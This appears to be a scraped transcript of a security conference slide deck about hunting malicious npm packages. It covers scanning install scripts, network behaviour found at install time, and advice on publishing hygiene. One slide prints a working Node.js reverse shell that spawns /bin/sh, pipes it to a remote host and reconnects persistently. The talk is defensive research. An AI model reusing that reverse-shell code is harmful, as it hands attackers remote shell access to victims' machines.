Hunting for malicious modules in npm - NodeSummit
-
Upload
adam-baldwin -
Category
Technology
-
view
57 -
download
1
Transcript of Hunting for malicious modules in npm - NodeSummit
![Page 1: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/1.jpg)
Hunting for Malicious Modules in
![Page 2: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/2.jpg)
adam_baldwinevilpacket
![Page 3: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/3.jpg)
liftsecurity.io
![Page 4: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/4.jpg)
nodesecurity.ioContinous Security Monitoring
![Page 5: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/5.jpg)
Hunting for Malicious Modules in
![Page 6: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/6.jpg)
WHY SHOULD WE HUNT?
![Page 7: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/7.jpg)
🕯Hey, I can publish malicious
code to npm
![Page 8: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/8.jpg)
💨this is bad.
![Page 9: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/9.jpg)
🔥install scripts are BAD!
![Page 10: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/10.jpg)
💩JavaScript BAD!
![Page 11: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/11.jpg)
rimrafall
![Page 12: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/12.jpg)
npm hydra worm
![Page 13: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/13.jpg)
WHAT ARE WE HUNTING?
![Page 14: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/14.jpg)
WHAT DEFINES MALICIOUS BEHAVIOR?
![Page 15: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/15.jpg)
var net = require('net');var daemon = require('daemon');var spawn = require('child_process').spawn;
function c() { var client = new net.Socket(); client.connect(443, "REDACTED", function() { var sh = spawn('/bin/sh', []); client.write("Connected\r\n"); client.pipe(sh.stdin); sh.stdout.pipe(client); });
client.on('error', function() {});
client.on('close', function() { setTimeout(c, 5000); });}
require('daemon')();c();
😈Example
![Page 16: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/16.jpg)
client.connect(443, "REDACTED", function() { var sh = spawn('/bin/sh', []);
![Page 17: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/17.jpg)
WHERE ARE WE HUNTING?
![Page 18: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/18.jpg)
![Page 19: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/19.jpg)
507,573 modules
![Page 20: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/20.jpg)
3,443,784 individual versions
![Page 21: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/21.jpg)
242,505,822 individual files
![Page 22: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/22.jpg)
21,756 modules with install scripts
![Page 23: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/23.jpg)
HOW AM I HUNTING?
![Page 24: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/24.jpg)
MIRROR REGISTRY
![Page 25: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/25.jpg)
INDEX MODULESFilenames Extensions Content Hash
![Page 26: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/26.jpg)
npm install module
syscall capture
DB
![Page 27: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/27.jpg)
npm publish GCS
PubSubInstrumentation
npm iraw data 🎉
![Page 28: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/28.jpg)
~24,000 modules processed
![Page 29: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/29.jpg)
2.1 TB OF DATA 😲
![Page 30: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/30.jpg)
22 53 80
443 1880 3000
9418 23400 27017 38584 54329 61337
3001 3306 4987 6379 8000 8002
8008 8043 8080 8090 9000 9001
DESTINATION PORTS
![Page 31: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/31.jpg)
DNS REQUESTS
339 unique lookups
![Page 32: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/32.jpg)
DESTINATION HOSTS
1080 unique hosts
![Page 33: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/33.jpg)
RESULTS😈
![Page 34: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/34.jpg)
144+ modules that download build components over HTTP
Insecure Behavior
![Page 35: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/35.jpg)
![Page 36: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/36.jpg)
Modules that called home
et_phone_home anarchy harmlesspackage botbait
![Page 37: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/37.jpg)
Modules that change registry settings
![Page 38: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/38.jpg)
😇 ? 😈
![Page 39: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/39.jpg)
😢 / 😀
![Page 40: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/40.jpg)
WHAT DID I LEARN?How can we improve the future
![Page 41: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/41.jpg)
People will publish malicious things to the registry
![Page 42: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/42.jpg)
Your security habits have a lot to do with if this gets exploited or not
![Page 43: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/43.jpg)
-Have good passwords -Don't publish credentials -Limit the # of publishers
![Page 44: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/44.jpg)
But what about ? Can't they do something?
![Page 45: Hunting for malicious modules in npm - NodeSummit](https://reader034.fdocuments.net/reader034/viewer/2022051710/5a6d61267f8b9af8418b5505/html5/thumbnails/45.jpg)
</presentation>Thanks
adam_baldwinevilpacket